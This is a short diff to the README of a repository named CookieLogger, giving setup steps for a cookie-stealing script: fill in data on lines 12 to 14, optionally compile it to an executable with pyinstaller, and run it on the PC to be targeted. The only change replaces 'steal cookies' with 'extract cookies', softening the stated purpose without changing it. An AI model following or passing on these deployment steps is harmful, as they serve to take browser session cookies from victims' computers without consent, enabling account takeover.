maxwell260/CookieLogger/README.md

 3. Open the script with a text editor
 4. Go to line 12, 13, 14 and enter the required data
 5. (optional) use pyinstaller (or another py-to-exe compiler) to convert the script into an executable file
-6. Run the script (or the exe) on the PC you want to steal cookies from
+6. Run the script (or the exe) on the PC you want to extract cookies from

 HOW IT WORKS